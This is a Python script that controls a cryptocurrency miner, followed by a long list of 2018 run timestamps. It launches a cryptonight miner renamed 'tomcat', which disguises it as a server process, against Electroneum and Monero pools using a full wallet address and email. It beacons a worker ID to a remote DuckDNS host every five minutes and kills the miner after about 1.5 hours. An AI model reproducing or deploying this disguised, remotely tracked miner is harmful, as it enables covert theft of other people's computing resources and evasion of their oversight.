import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:08:07.385074
#2018-02-17 15:55:03.994644
#2018-02-17 17:43:06.704783
#2018-02-17 19:29:03.938997
#2018-02-17 21:18:04.720750
#2018-02-17 23:02:07.438659
#2018-02-18 00:50:01.481458
#2018-02-18 02:37:06.520960
#2018-02-18 04:24:06.221025
#2018-02-18 06:16:06.288099
#2018-02-18 08:06:06.852352
#2018-02-18 09:53:01.956429
#2018-02-18 11:40:03.849972
#2018-02-18 13:25:06.215440
#2018-02-18 15:15:10.245359
#2018-02-18 17:04:05.818550
#2018-02-18 18:50:07.555711
#2018-02-18 20:37:04.650110
#2018-02-18 22:23:04.225948
#2018-02-19 00:12:04.786107
#2018-02-19 01:58:01.288981
#2018-02-19 03:44:06.377941
#2018-02-19 05:30:07.022801
#2018-02-19 07:17:06.725144
#2018-02-19 09:06:04.778919
#2018-02-19 10:54:01.711743
#2018-02-19 12:43:01.739697
#2018-02-19 14:31:05.516988
#2018-02-19 16:19:05.711645
#2018-02-19 18:07:07.795708
#2018-02-19 19:53:07.505222
#2018-02-19 21:40:08.304048
#2018-02-19 23:26:06.271276
#2018-02-20 01:12:07.042047
#2018-02-20 03:03:07.961380
#2018-02-20 04:51:06.005745
#2018-02-20 06:34:05.804806
#2018-02-20 08:19:07.276142
#2018-02-20 10:04:07.862837
#2018-02-20 11:48:04.497545
#2018-02-20 13:36:07.635458
#2018-02-20 15:21:01.963837
#2018-02-20 17:06:05.383221
#2018-02-20 18:54:08.836862
#2018-02-20 20:45:04.480021
#2018-02-20 22:31:01.522644
#2018-02-21 00:11:07.511551
#2018-02-21 01:58:05.438270
#2018-02-21 03:46:07.584985
#2018-02-21 05:37:04.834690
#2018-02-21 07:25:08.236224
#2018-02-21 09:09:02.141031
#2018-02-21 10:57:05.289930
#2018-02-21 12:45:02.756647
#2018-02-21 14:33:05.662640
#2018-02-21 16:20:08.590827
#2018-02-21 18:11:05.249636
#2018-02-21 19:57:04.583045
#2018-02-21 21:46:05.654908
#2018-02-21 23:42:07.518684
#2018-02-22 01:31:04.300022
#2018-02-22 03:18:06.718592
#2018-02-22 05:05:07.727591
#2018-02-22 06:48:05.729955
#2018-02-22 08:37:05.398215
#2018-02-22 10:25:10.580205
#2018-02-22 12:10:13.100490
#2018-02-22 13:56:05.215646
#2018-02-22 15:43:01.531823
#2018-02-22 17:29:06.358176
#2018-02-22 19:17:04.131417
#2018-02-22 21:08:06.768332
#2018-02-22 22:53:08.207701
#2018-02-23 00:40:12.235689
#2018-02-23 02:28:04.110688
#2018-02-23 04:17:04.770513
#2018-02-23 06:02:07.157656
#2018-02-23 07:49:05.985151
#2018-02-23 10:07:07.540069
#2018-02-23 12:05:09.623748
#2018-02-23 13:53:05.866736
#2018-02-23 15:43:06.457171
#2018-02-23 17:29:02.026682
#2018-02-23 19:16:07.505100
#2018-02-23 21:00:12.706812
#2018-02-23 22:45:09.772478
#2018-02-24 00:32:07.260525
#2018-02-24 02:23:05.488307
#2018-02-24 04:14:04.532885
#2018-02-24 06:02:06.334995
#2018-02-24 07:49:08.343624
#2018-02-24 09:28:05.203132
#2018-02-24 11:21:05.963790
#2018-02-24 13:11:04.078851
#2018-02-24 15:01:08.031500
#2018-02-24 16:50:06.893334
#2018-02-24 18:38:03.983228
#2018-02-24 20:29:03.576594
#2018-02-24 22:25:07.049176
#2018-02-25 01:34:01.306993
#2018-02-25 05:29:06.303875
#2018-02-25 11:35:05.769157